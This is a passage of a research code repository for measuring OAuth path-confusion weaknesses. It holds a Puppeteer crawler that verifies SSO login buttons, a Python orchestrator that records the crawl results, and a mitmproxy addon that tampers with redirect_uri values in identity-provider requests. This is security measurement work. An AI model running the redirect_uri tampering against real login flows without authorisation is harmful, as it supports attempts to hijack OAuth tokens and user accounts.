outs=Proxy_subproc.stdout 186 | buff=outs.read() 187 | print(f'output proxy:{buff}') 188 | 189 | #save mitm files 190 | with open(namefile+"-proxylog.txt", 'w') as f: 191 | f.write(buff) 192 | 193 | #move file to experiment folder 194 | try: 195 | os.rename(namefile+"-crawlerlog.txt", gen_path+"/"+namefile+"-crawlerlog.txt") 196 | os.rename(namefile+"-proxylog.txt", gen_path+"/"+namefile+"-proxylog.txt") 197 | os.rename(namefile+"-stream", gen_path+"/"+namefile+"-stream") 198 | os.rename(namefile+"-commands.txt", gen_path+"/"+namefile+"-commands.txt") 199 | except Exception as e: 200 | print(f'exception with this measurement go ahead!!!') 201 | 202 | 203 | print("browser and proxy ready for next measurement") 204 | #time.sleep(90) 205 | time.sleep(30) 206 | 207 | #change this to modify fraction of site of each stint 208 | if(fractionate%35==0): 209 | #save snapshot of sites analyzed and wait for next trance of sites to analyze 210 | print("save temporary snapshot sites analyzed") 211 | with open(gen_path+"/"+p+"-Target[temporary-snapshot].txt", 'a') as f: 212 | for s in range(len(Site_analyzed)): 213 | if s==len(Site_analyzed)-1: 214 | f.write(str(Site_analyzed[s])+"\n") 215 | else: 216 | f.write(str(Site_analyzed[s])+"\n") 217 | #wait 3hr between trance of sites 218 | #time.sleep(10800) 219 | time.sleep(30) 220 | 221 | #save site analyzed 222 | print("save site analyzed") 223 | with open(gen_path+"/"+p+"-Target.txt", 'a') as f: 224 | for s in range(len(Site_analyzed)): 225 | if s==len(Site_analyzed)-1: 226 | f.write(str(Site_analyzed[s])+"\n") 227 | else: 228 | f.write(str(Site_analyzed[s])+"\n") 229 | #remove snapshot of file if present 230 | if os.path.exists(gen_path+"/"+p+"-Target[temporary-snapshot].txt"): 231 | os.remove(gen_path+"/"+p+"-Target[temporary-snapshot].txt") 232 | 233 | #wait before next pathconfusion experiment 234 | print("wait between one path confusion and the other pathconfusion vector") 235 | time.sleep(30) 236 | #time.sleep(180) 237 | 
-------------------------------------------------------------------------------- /verifysites.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const FS = require('fs'); 3 | const TLDJS = require('tldjs'); 4 | const ArgParse = require('argparse'); 5 | 6 | let WEBPAGE = null; 7 | let NameSITE = null; 8 | let TAG = null; 9 | let IDP = null; 10 | let IDP_Info = {}; 11 | let XPathSSOElem=null; 12 | let newwindow=false; 13 | let measurement=""; 14 | 15 | function parseArguments() { 16 | let parser = new ArgParse.ArgumentParser({ 17 | add_help:true, 18 | description: 'Argparse example' 19 | }); 20 | 21 | parser.add_argument( 22 | '--parameters', 23 | { 24 | action: 'store', 25 | required: true, 26 | help: 'parameters file' 27 | } 28 | ); 29 | 30 | let args = parser.parse_args(); 31 | PARAMETER= args.parameters; 32 | } 33 | 34 | 35 | async function Oauthurl(checkURL) { 36 | //search for oauth keyworks in url 37 | var identifiers=["redirect_uri","oauth"]; 38 | var arrayLength = identifiers.length; 39 | for (var i = 0; i < arrayLength; i++) { 40 | let res = checkURL.search(identifiers[i]) 41 | if(res >0){ 42 | console.log("oauth keyword found in url"); 43 | console.log(identifiers[i]); 44 | console.log(checkURL); 45 | return true; 46 | } 47 | } 48 | return false; 49 | } 50 | 51 | async function Save_textfile(name,content){ 52 | //save file with HTML 53 | FS.writeFileSync(name,content); 54 | } 55 | 56 | (async() => { 57 | console.log("Step1 get info for the crawler"); 58 | parseArguments(); 59 | let rawdata = FS.readFileSync(PARAMETER); 60 | let params = JSON.parse(rawdata); 61 | WEBPAGE = params["WEBPAGE"]; 62 | NameSITE = params["NameSITE"]; 63 | XPathSSOElem = params["xpath"]; 64 | OutputName = params["name"]; 65 | OutputPath = params["outpath"]; 66 | TAG=params["tag"]; 67 | console.log("parameters received WEBPAGE: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s\nTAG: %s",WEBPAGE,XPathSSOElem,OutputPath,OutputName,TAG); 68 | 69 | 70 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element 71 | console.log("Step2:start the login procedure") 72 | //start browser 73 | //'--proxy-server=http://127.0.0.1:7777', 74 | const browser = await puppeteer.launch({args:['--disable-gpu', 75 | '--no-sandbox', 76 | '--disable-popup-blocking', 77 | '--disable-notifications', 78 | '--password-store=basic', 79 | '--ignore-certificate-errors'], 80 | headless: false, 81 | executablePath: '/bin/google-chrome-stable'}); 82 | 83 | const page = await browser.newPage(); 84 | 85 | try{ 86 | await page.goto(WEBPAGE, {waitUntil: 'load'}); 87 | }catch(ex){ 88 | console.log("error in surfing to the login page!ABORT-EXPERIMENT:YES"); 89 | await browser.close(); 90 | process.exit(101); 91 | } 92 | 93 | let initial_url=page.url(); 94 | //initial_url=initial_url.split("#")[0]; 95 | 96 | var domainbegin = TLDJS.parse(initial_url).domain; 97 | await page.waitForTimeout(5000); 98 | 99 | //take screenshot 100 | await page.screenshot({path: OutputPath+"/"+OutputName+"_Initial.png" ,fullPage: true}); 101 | 102 | //evaluate XPath 103 | try{ 104 | var SSO_Elem = await page.$x(XPathSSOElem); 105 | }catch(ex){ 106 | if(ex.message.includes("Evaluation failed")){ 107 | console.log("evaluation of xpath failed xpath syntactically wrong!"); 108 | await browser.close(); 109 | process.exit(106); 110 | /* 111 | console.log("wrong xpath use backup procedure as selector"); 112 | try{ 113 | await 
Promise.all([page.click(XPathSSOElem), 114 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]); 115 | }catch(error){ 116 | console.log("error in the click as a selector"); 117 | console.log("click as a selector not working wrong xpath? check if open a new tab"); 118 | } 119 | */ 120 | } 121 | } 122 | 123 | if(SSO_Elem.length>0){ 124 | console.log("found SSO_Elem: %s",SSO_Elem); 125 | try{ 126 | var SSO_Elem = await page.$x(XPathSSOElem); 127 | console.log("SSO_Elem: %s",SSO_Elem); 128 | console.log("use the SSO_Elem to click"); 129 | await Promise.all([SSO_Elem[0].click(), 130 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]); 131 | } 132 | catch{ 133 | console.log("click do not caused the redirect check if opened a new windows or stop"); 134 | //means xpath not working or check new windows 135 | 136 | } 137 | }else { 138 | console.log("the xpath is not found stop here the experiment"); 139 | await browser.close(); 140 | //return code for 141 | process.exit(107); 142 | 143 | } 144 | 145 | //gives time to obtain any new tab opened 146 | await page.waitForTimeout(3000); 147 | var Open_Pages = await browser.pages(); 148 | console.log("numbers of pages after click:%s",Open_Pages.length); 149 | await page.waitForTimeout(6000); 150 | 151 | //Step3: identify new open window and take a screenshot of initial tab page after SSO click 152 | console.log("step3:identify if open new window and check oauth param in redirect url"); 153 | 154 | let opentabs = Open_Pages.length; 155 | console.log("numbers of pages after click:%s",Open_Pages.length); 156 | await Open_Pages[1].screenshot({path: OutputPath+"/"+OutputName+"_AfterSSOClick.png" ,fullPage: true}); 157 | 158 | if(opentabs>2){//new window case 159 | //Step4: look at tabs and check the new windows if oauth params in url means right xpath so collect domain idp and close browser 160 | try{ 161 | var tabindex_IDP=-1; 162 | for (var i = 0; i < Open_Pages.length; i++) { 163 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){ 164 | //check url contains oauth keywords 165 | console.log("verify that new windows url has oauth keywords"); 166 | url_newwindow=Open_Pages[i].url(); 167 | let test1=await Oauthurl(url_newwindow); 168 | if(test1){ 169 | idp_domain=TLDJS.parse(url_newwindow).domain; 170 | //obtain domain idp and save it to file 171 | //namesite;loginpage;xpathelement;idp_domain 172 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG; 173 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content); 174 | console.log("Click succesfully redirect to a link with oauth param"); 175 | await browser.close(); 176 | process.exit(104); 177 | } 178 | } 179 | } 180 | 181 | console.log("tab index after search:%s",tabindex_IDP); 182 | if (tabindex_IDP===-1){ 183 | console.log("tab not found!!"); 184 | console.log("Open a new tab but not with oauth check xpath! 
ABORT-EXPERIMENT:YES"); 185 | await browser.close(); 186 | process.exit(103); 187 | } 188 | }catch(ex){ 189 | console.log("error in Step4 inspect test in:"); 190 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem; 191 | console.log(testfailed) 192 | console.log(ex); 193 | await browser.close(); 194 | process.exit(105); 195 | 196 | } 197 | 198 | } 199 | else { 200 | console.log("Step4alt: check url for presence of oauthparam"); 201 | try{ 202 | await page.waitForTimeout(3000); 203 | var check_url=page.url(); 204 | 205 | if(check_url===initial_url){ 206 | //verify differentiation between xpath not found and sso click not working 207 | console.log("no new window and same initial url Xpath SSO not working"); 208 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES"); 209 | await browser.close(); 210 | process.exit(102); 211 | } 212 | else{ 213 | //Step4alt: no new window check url if conatins ouauth keyword and then obatin domain idp 214 | console.log("Step4alt: check url if contains oauthparam"); 215 | await page.waitForTimeout(3000); 216 | var check_url=page.url(); 217 | let test= await Oauthurl(check_url); 218 | if(test){ 219 | idp_domain=TLDJS.parse(check_url).domain; 220 | //obtain domain idp and save it to file 221 | //WEBPAGE;loginpage;idp;domain 222 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG; 223 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content); 224 | console.log("Click succesful idp in url with oauth param"); 225 | await browser.close(); 226 | process.exit(104); 227 | } 228 | else{ 229 | console.log("no oauthparam check correctness xpath sso element"); 230 | await browser.close(); 231 | process.exit(103); 232 | } 233 | } 234 | }catch(ex){ 235 | console.log("error in Step4alt inspect test in:"); 236 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+TAG; 237 | console.log(testfailed); 238 | console.log(ex); 239 | await browser.close(); 240 | process.exit(105); 241 | } 242 | } 243 | 244 | })(); 245 | -------------------------------------------------------------------------------- /Start-SitesVerification.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from subprocess import PIPE 3 | from subprocess import TimeoutExpired 4 | import urllib.parse 5 | import re,time,json,os,sys,copy 6 | import hashlib 7 | 8 | 9 | def Identify_SSO_idp(idp,SSO): 10 | sso=[] 11 | for i in SSO: 12 | if i["provider"]==idp: 13 | sso.append(i) 14 | return sso 15 | 16 | def GenResultFolder(folder): 17 | #Path output result 18 | if not os.path.exists(folder): 19 | os.makedirs(folder) 20 | else: 21 | print("directory alredy present do not override") 22 | 23 | def UpdateInfo(sites,newinfo,newsites): 24 | print(f'received this new info:{newinfo}') 25 | updatedsites=newsites.keys() 26 | info=newinfo.split("@@@@") 27 | temp={} 28 | print(f'infor after split: {info}') 29 | if(info[0] not in updatedsites): 30 | print(f'site to be updated: {info[0]}') 31 | for s in sites: 32 | if(s["site"]==info[0]): 33 | # 34 | temp=copy.deepcopy(s) 35 | break 36 | print(f'old site info:{temp}') 37 | tomodify={} 38 | #obtain SSO to be modified 39 | for l in temp["loginpages"]: 40 | if(l["loginpage"]==info[1]): 41 | for i in l["SSOs"]: 42 | try: 43 | if(i["tag"] == info[4]): 44 | tomodify=copy.deepcopy(i) 45 | except Exception as e: 46 | if(i["provider"] in info[3]): 47 | tomodify=copy.deepcopy(i) 48 | 49 | #update sso info 50 | tomodify["provider"]=info[3] 51 | 52 | #add to new sites info 
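        #(newinfo is the "@@@@"-separated record written by verifysites.js:
        # site@@@@loginpage@@@@xpath@@@@idp_domain@@@@tag, i.e.
        # info[0]=site, info[1]=login page URL, info[2]=xpath, info[3]=IdP domain, info[4]=tag)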
53 | for l in temp["loginpages"]: 54 | if(l["loginpage"]==info[1]): 55 | print(f'len sso before:{len(l["SSOs"])}') 56 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"]) 57 | #print(f'before idps:{idptempb}') 58 | l["SSOs"]=[] 59 | l["SSOs"].append(tomodify) 60 | print(f'len sso after:{len(l["SSOs"])}') 61 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"]) 62 | print(f'after idps:{idptempa}') 63 | 64 | print(f'the new site info:{temp}') 65 | newsites[info[0]]=temp 66 | else: 67 | print(f'\nsite:{info[0]} already in the dictionary') 68 | save={} 69 | for s in sites: 70 | if(s["site"]==info[0]): 71 | save=copy.deepcopy(s) 72 | break 73 | 74 | print(f'get old site info:\n{save}\n \nNew info to be added to site:{newinfo}') 75 | 76 | #obtain SSO to be updated 77 | tomodify={} 78 | for l in save["loginpages"]: 79 | if(l["loginpage"]==info[1]): 80 | for i in l["SSOs"]: 81 | try: 82 | if(i["tag"] == info[4]): 83 | tomodify=copy.deepcopy(i) 84 | except Exception as e: 85 | if(i["provider"] in info[3]): 86 | tomodify=copy.deepcopy(i) 87 | 88 | #update info 89 | tomodify["provider"]=info[3] 90 | 91 | #add info to new site 92 | temp= newsites[info[0]] 93 | print(f'old site info:\n{temp}') 94 | print(f'new SSO:{tomodify}') 95 | for l in temp["loginpages"]: 96 | if(l["loginpage"]==info[1]): 97 | print(f'len sso before:{len(l["SSOs"])}') 98 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"]) 99 | print(f'before idps:{idptempb}') 100 | l["SSOs"].append(tomodify) 101 | print(f'len sso after:{len(l["SSOs"])}') 102 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"]) 103 | print(f'after idps:{idptempa}') 104 | print(f'the new site info:{temp}') 105 | newsites[info[0]]=temp 106 | 107 | 108 | if __name__ == "__main__": 109 | #input experiment: site and login pages 110 | #output experiment: file site verified for each logipage each idp xpath and 111 | sites = json.load(open(sys.argv[1],'r')) 112 | outputfolder=sys.argv[2] 113 | 114 | 115 | Site_analyzed=[] 116 | Nologinpage=[] 117 | NoSSOs=[] 118 | #key site and content site info 119 | updatedsites=dict() 120 | #site key and loginpage/idp value 121 | Missing_Xpath=dict() 122 | Wrong_SSOelement=dict() 123 | Syntactical_Wrong_Xpath=dict() 124 | CrawlerCrash=dict() 125 | NoActionElement=dict() 126 | EmptyResult=dict() 127 | 128 | #site key and list of loginpage as value 129 | Logingpage_unreachable=dict() 130 | start_time = time.time() 131 | 132 | GenResultFolder(outputfolder) 133 | 134 | 135 | for site in sites: 136 | if(not site['loginpages']): 137 | print(f'Site{site["site"]} without login pages') 138 | Nologinpage.append(site["site"]) 139 | continue 140 | 141 | Site_analyzed.append(site["site"]) 142 | for l in site['loginpages']: 143 | #no SSO move to next login page 144 | if(len(l["SSOs"])==0): 145 | NoSSOs.append(site["site"]) 146 | continue 147 | 148 | Idp_sso=l["SSOs"] 149 | for s in Idp_sso: 150 | print(f'Test idp:{s["provider"]} on site: {site["site"]} loginpage:{l["loginpage"]}') 151 | 152 | try: 153 | if("//script" in s["xpath"]): 154 | continue 155 | 156 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest() 157 | namefile=str(site['site'])+"-"+str(pagehash) 158 | 159 | except Exception as e: 160 | 161 | print("site with no xpath?") 162 | #key site and login page/idp 163 | if(site["site"] not in Missing_Xpath.keys()): 164 | Missing_Xpath[site["site"]]=[] 165 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 166 | 167 | else: 168 | 
Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 169 | 170 | continue 171 | 172 | #build parameter file for crawler 173 | paramfile="paramfile.json" 174 | 175 | paramters={ 176 | "WEBPAGE":l["loginpage"], 177 | "NameSITE":site["site"], 178 | "xpath":s["xpath"], 179 | "name":namefile, 180 | "outpath":outputfolder, 181 | "tag":s["tag"] 182 | } 183 | print(f'parameters generated:{paramters}') 184 | time.sleep(2) 185 | 186 | with open(paramfile, 'w') as f: 187 | json.dump(paramters,f) 188 | 189 | #parameter file 190 | cmd=["node","verifysites.js"] 191 | cmd.append("--parameters="+paramfile) 192 | 193 | time.sleep(2) 194 | #start crawler 195 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 196 | print("crawler started") 197 | time.sleep(3) 198 | #wait the crawler to terminate and get return code 199 | crawlresult=-1 200 | try: 201 | crawlresult=Crawler_subproc.wait(timeout=120) 202 | except TimeoutExpired: 203 | print("crawler blocked kill it and go ahead") 204 | crawlresult=Crawler_subproc.kill() 205 | 206 | print(f'print result Execution(return code subprocess) crawler:{crawlresult}') 207 | 208 | outs=Crawler_subproc.stdout 209 | buff=outs.read() 210 | print(f'output of crawler:{buff}') 211 | 212 | #save crawler output 213 | with open(namefile+"-crawlerlog.txt", 'w') as f: 214 | f.write(buff) 215 | 216 | time.sleep(2) 217 | print(f'before checking crawlresult:{crawlresult}') 218 | if(crawlresult==104): 219 | print("result of crawler succesfull") 220 | #update site info: 221 | with open(outputfolder+"/"+namefile+"-updateinfo.txt",'r') as f: 222 | newinfo=f.read() 223 | print(f'new info obtained by the crawler:{newinfo}') 224 | 225 | UpdateInfo(sites,newinfo,updatedsites) 226 | 227 | elif(crawlresult==102): 228 | print("xpath not producing any action discard element") 229 | 230 | if(site["site"] not in NoActionElement.keys()): 231 | NoActionElement[site["site"]]=[] 232 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 233 | else: 234 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 235 | 236 | 237 | 238 | elif(crawlresult==107): 239 | print("search xpath fail no element found wrong xpath") 240 | #EmptyResult 241 | if(site["site"] not in EmptyResult.keys()): 242 | EmptyResult[site["site"]]=[] 243 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"]) 244 | else: 245 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"]) 246 | 247 | 248 | 249 | elif(crawlresult==106): 250 | print("search xpath fail syntactically wrong xpath") 251 | 252 | if(site["site"] not in Syntactical_Wrong_Xpath.keys()): 253 | Syntactical_Wrong_Xpath[site["site"]]=[] 254 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 255 | else: 256 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 257 | 258 | 259 | elif(crawlresult==101): 260 | print(f'login page unreachable') 261 | 262 | if(site["site"] not in Logingpage_unreachable.keys()): 263 | Logingpage_unreachable[site["site"]]=[] 264 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"]) 265 | else: 266 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"]) 267 | 268 | elif(crawlresult==105): 269 | print("manually anlyze this site because of crawler error") 270 | 271 | if(site["site"] not in CrawlerCrash.keys()): 272 | CrawlerCrash[site["site"]]=[] 273 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"]) 274 | else: 275 
| CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"]) 276 | 277 | elif(crawlresult==103): 278 | print("no oauth parameters in redirection link after click") 279 | 280 | if(site["site"] not in Wrong_SSOelement.keys()): 281 | Wrong_SSOelement[site["site"]]=[] 282 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 283 | else: 284 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 285 | 286 | #move file to experiment folder 287 | os.rename(namefile+"-crawlerlog.txt", outputfolder+"/"+namefile+"-crawlerlog.txt") 288 | 289 | print("browser ready for next measurement") 290 | time.sleep(2) 291 | 292 | #print new info site 293 | output_name=outputfolder+"/"+"Result-newinfo.json" 294 | File = open(output_name, "w+") 295 | File.write(json.dumps(updatedsites)) 296 | File.close() 297 | 298 | with open(outputfolder+"/"+"Result-NoSSos.txt", 'w') as f: 299 | for s in range(len(NoSSOs)): 300 | f.write(str(NoSSOs[s])+"\n") 301 | 302 | with open(outputfolder+"/"+"Result-Nologinpage.txt", 'w') as f: 303 | for s in range(len(Nologinpage)): 304 | f.write(str(Nologinpage[s])+"\n") 305 | 306 | #print problem site 307 | output_name=outputfolder+"/"+"Result-Missing_Xpath.json" 308 | File = open(output_name, "w+") 309 | File.write(json.dumps(Missing_Xpath)) 310 | File.close() 311 | 312 | #print problem site 313 | output_name=outputfolder+"/"+"Result-Wrong_SSOelement.json" 314 | File = open(output_name, "w+") 315 | File.write(json.dumps(Wrong_SSOelement)) 316 | File.close() 317 | 318 | #print problem site 319 | output_name=outputfolder+"/"+"Result-Syntactical_Wrong_Xpath.json" 320 | File = open(output_name, "w+") 321 | File.write(json.dumps(Syntactical_Wrong_Xpath)) 322 | File.close() 323 | 324 | #print crash crawler site 325 | output_name=outputfolder+"/"+"Result-CrawlerCrash.json" 326 | File = open(output_name, "w+") 327 | File.write(json.dumps(CrawlerCrash)) 328 | File.close() 329 | 330 | #EmptyResult 331 | #print not oauth element 332 | output_name=outputfolder+"/"+"Result-EmptyResult.json" 333 | File = open(output_name, "w+") 334 | File.write(json.dumps(EmptyResult)) 335 | File.close() 336 | 337 | #print not oauth element 338 | output_name=outputfolder+"/"+"Result-NoActionElement.json" 339 | File = open(output_name, "w+") 340 | File.write(json.dumps(NoActionElement)) 341 | File.close() 342 | 343 | #print problem site 344 | output_name=outputfolder+"/"+"Result-Logingpage_unreachable.json" 345 | File = open(output_name, "w+") 346 | File.write(json.dumps(Logingpage_unreachable)) 347 | File.close() 348 | 349 | 350 | save=list(updatedsites.values()) 351 | print("save updated site analyzed") 352 | output_name="Verified_Sites.json" 353 | File = open(output_name, "w+") 354 | File.write(json.dumps(save)) 355 | File.close() 356 | 357 | #extract top IdPs from file generated 358 | sites = json.load(open(output_name,'r')) 359 | 360 | Site_analyzed=[] 361 | IDP=dict() 362 | 363 | for site in sites: 364 | if(not site['loginpages']): 365 | continue 366 | for l in site['loginpages']: 367 | #no SSO move to next login page 368 | if(len(l["SSOs"])==0):continue 369 | 370 | for s in l["SSOs"]: 371 | if(s["provider"] not in IDP.keys()): 372 | IDP[s["provider"]]=[site["site"]] 373 | else: 374 | if(site["site"]not in IDP[s["provider"]]): 375 | IDP[s["provider"]].append(site["site"]) 376 | else: 377 | continue 378 | 379 | arranged=sorted(IDP, key=lambda k: len(IDP[k]), reverse=True) 380 | for k in arranged: 381 | print(f'idp:{k}\n{IDP[k]}') 382 | with open("Top_Idps.json",'w') 
as f: 383 | for i in arranged: 384 | #only IdPs with more than 3 sites are considered 385 | if(len(IDP[i])>3): 386 | t={"idp":i,"sites":IDP[i]} 387 | json.dump(t,f) 388 | 389 | -------------------------------------------------------------------------------- /tamper_http_header-path_conf.py: -------------------------------------------------------------------------------- 1 | from mitmproxy.net.http.http1.assemble import assemble_request 2 | import sys,typing,os 3 | import urllib.parse 4 | from urllib.parse import urlparse 5 | from mitmproxy import ctx 6 | from mitmproxy import exceptions 7 | from mitmproxy import types 8 | 9 | class PathConfString: 10 | Keywords=[] 11 | LinkPrefix=[] 12 | 13 | def load(self, loader): 14 | loader.add_option( 15 | name = "inject", 16 | typespec = str, 17 | default = "", 18 | help = "Provide the pathconfusion string", 19 | ) 20 | 21 | loader.add_option( 22 | name = "linkprefix0", 23 | typespec = str, 24 | default = "", 25 | help = "link prefix where to inject the path confusion", 26 | ) 27 | 28 | loader.add_option( 29 | name = "linkprefix1", 30 | typespec = str, 31 | default = "", 32 | help = "link prefix where to inject the path confusion", 33 | ) 34 | 35 | loader.add_option( 36 | name = "counter", 37 | typespec = int, 38 | default = 1, 39 | help = "Define how many request modify", 40 | ) 41 | 42 | loader.add_option( 43 | name = "keywords0", 44 | typespec = str, 45 | default = "", 46 | help = "keyword to identify network reqest to modify", 47 | ) 48 | 49 | loader.add_option( 50 | name = "keywords1", 51 | typespec = str, 52 | default = "", 53 | help = "keyword to identify network reqest to modify", 54 | ) 55 | 56 | loader.add_option( 57 | name = "keywords2", 58 | typespec = str, 59 | default = "", 60 | help = "keyword to identify network reqest to modify", 61 | ) 62 | 63 | loader.add_option( 64 | name = "keywords3", 65 | typespec = str, 66 | default = "", 67 | help = "keyword to identify network reqest to modify", 68 | ) 69 | 70 | loader.add_option( 71 | name = "keywords4", 72 | typespec = str, 73 | default = "", 74 | help = "keyword to identify network reqest to modify", 75 | ) 76 | 77 | loader.add_option( 78 | name = "idphostname", 79 | typespec = str, 80 | default = "", 81 | help = "hostname of idp to be intercepted and modified", 82 | ) 83 | 84 | 85 | def checkurlkeywords(self,flow): 86 | self.Keywords.append(ctx.options.keywords0) 87 | self.Keywords.append(ctx.options.keywords1) 88 | self.Keywords.append(ctx.options.keywords2) 89 | self.Keywords.append(ctx.options.keywords3) 90 | self.Keywords.append(ctx.options.keywords4) 91 | 92 | self.Keywords=list(filter(None, self.Keywords)) 93 | 94 | for i in self.Keywords: 95 | if i not in flow.request.url: 96 | return False 97 | 98 | return True 99 | 100 | def checkurlprefix(self,flow): 101 | self.LinkPrefix.append(ctx.options.linkprefix0) 102 | self.LinkPrefix.append(ctx.options.linkprefix1) 103 | 104 | self.LinkPrefix=list(filter(None, self.LinkPrefix)) 105 | 106 | found=False 107 | for i in self.LinkPrefix: 108 | if i in flow.request.url: 109 | found=True 110 | 111 | if found: return True 112 | return False 113 | 114 | 115 | def request(self,flow): 116 | print("inspecting request", file=sys.stdout) 117 | if ctx.options.counter<=0:return 118 | 119 | if flow.request.method.strip().upper() == 'GET': 120 | checkurl = urlparse(flow.request.url) 121 | #inspect only request with the IDP as domain 122 | if(ctx.options.idphostname in checkurl.hostname): 123 | print("request with idphostname", file=sys.stdout) 124 | 
#check request with the right prefix 125 | if not self.checkurlprefix(flow): return 126 | 127 | print(f'found link with rightprefix: {flow.request.url}',file=sys.stdout) 128 | #check request url with the right keywords 129 | if not self.checkurlkeywords(flow): return 130 | 131 | print("found a good candidate request to modify", file=sys.stdout) 132 | 133 | ctx.options.counter-=1 134 | if ctx.options.counter>=1: 135 | print("first request ignore it",file=sys.stdout) 136 | return 137 | 138 | multi_cmd=False 139 | if("+" in ctx.options.inject):multi_cmd=True 140 | #modify last w remove it or attach 141 | if("mdf" in ctx.options.inject and "lw" in ctx.options.inject): 142 | #modify last word of redirect uri 143 | b=flow.request.url.find("redirect_uri") 144 | f=flow.request.url.find("&",b) 145 | if(f>0): 146 | #find next param or end of string 147 | print(f'f greather than 0 so internal param', file=sys.stdout) 148 | ret=flow.request.url[b+13:f] 149 | else: 150 | ret=flow.request.url[b+13:] 151 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 152 | #search / or %2f from end of redirect_uri 153 | cut=ret.rfind("/") 154 | if(cut<0): 155 | cut=ret.rfind('%2f') 156 | if(cut<0): 157 | cut=ret.rfind('%2F') 158 | if(cut<0): 159 | print("not able to find / or %2f or %2F",file=sys.stdout) 160 | return 161 | #modify word if larger than mod requested 162 | mod=4 163 | if(len(ret)-cut>mod): 164 | t=len(ret)-mod 165 | print(f'extracted string to capitalize: {ret[t:]}',file=sys.stdout) 166 | up=ret[t:].upper() 167 | print(f'upper string:{up}',file=sys.stdout) 168 | new=ret[:t]+up 169 | print(f'temp string modified with replace: {new}', file=sys.stdout) 170 | temp=flow.request.url 171 | bb=temp.replace(ret,new) 172 | flow.request.url=bb 173 | return 174 | else: 175 | print(f'world shorter: {len(ret)-cut} than mod requested {mod}',file=sys.stdout) 176 | return 177 | elif("rm" in ctx.options.inject and "lw" in ctx.options.inject): 178 | #modify last word of redirect uri 179 | b=flow.request.url.find("redirect_uri") 180 | f=flow.request.url.find("&",b) 181 | if(f>0): 182 | ret=flow.request.url[b+13:f] 183 | else: 184 | ret=flow.request.url[b+13:] 185 | #search / or %2f from end of redirect_uri 186 | cut=ret.rfind("/") 187 | if(cut<0): 188 | encut=ret.rfind('%2f') 189 | if(encut<0): 190 | encut=ret.rfind('%2F') 191 | if(encut<0): 192 | print("not able to find / or %2f",file=sys.stdout) 193 | return 194 | #remove last word 195 | print(f'ret string:{ret} len: {len(ret)}',file=sys.stdout) 196 | if(cut<0): 197 | print(f'found separator at position {encut} string from cut on {ret[encut:]} before cut {ret[:encut]}') 198 | else: 199 | print(f'found separator at position {cut} string from cut on {ret[cut:]} before cut {ret[:cut]}') 200 | 201 | if(cut<0): 202 | #means I found the encoded add 3 to keep / encoded 203 | new=ret[:encut] 204 | else: 205 | #normal char #add 1 to keep / 206 | new=ret[:cut] 207 | 208 | temp=flow.request.url 209 | bb=temp.replace(ret,new) 210 | flow.request.url=bb 211 | print(f'temp string modified with replace: {new}', file=sys.stdout) 212 | print(f'new temporary url: {flow.request.url}', file=sys.stdout) 213 | 214 | if(not multi_cmd):return 215 | else:second=ctx.options.inject.split("+")[1] 216 | 217 | print("at this point removed last word plus attach attack",file=sys.stdout) 218 | print("attach pathconfusion",file=sys.stdout) 219 | 220 | b=flow.request.url.find("redirect_uri") 221 | f=flow.request.url.find("&",b) 222 | 223 | if(f>0): 224 | #find next param or end of string 225 | 
print(f'f greather than 0 so internal param', file=sys.stdout) 226 | ret=flow.request.url[b+13:f] 227 | else: 228 | ret=flow.request.url[b+13:] 229 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 230 | 231 | #try use lib to concatenate pathconfusion 232 | test1=urllib.parse.unquote(ret) 233 | print(f'test url unquoted: {test1}', file=sys.stdout) 234 | test=urlparse(test1) 235 | testpath=test.path 236 | print(f'test path extracted: {testpath}', file=sys.stdout) 237 | print(f'used second as inject string: {second}',file=sys.stdout) 238 | newpath=testpath+second 239 | print(f'new path generated: {newpath}', file=sys.stdout) 240 | newurl=test._replace(path=newpath).geturl() 241 | print(f'new url generated(unquoted): {newurl}', file=sys.stdout) 242 | quotedurl=urllib.parse.quote(newurl, safe='') 243 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout) 244 | 245 | temp=flow.request.url 246 | print(f'temp string: {temp}', file=sys.stdout) 247 | new=temp.replace(ret,quotedurl) 248 | print(f'temp string modified with replace: {new}', file=sys.stdout) 249 | flow.request.url=new 250 | 251 | else: 252 | print("only attach the pathconfusion 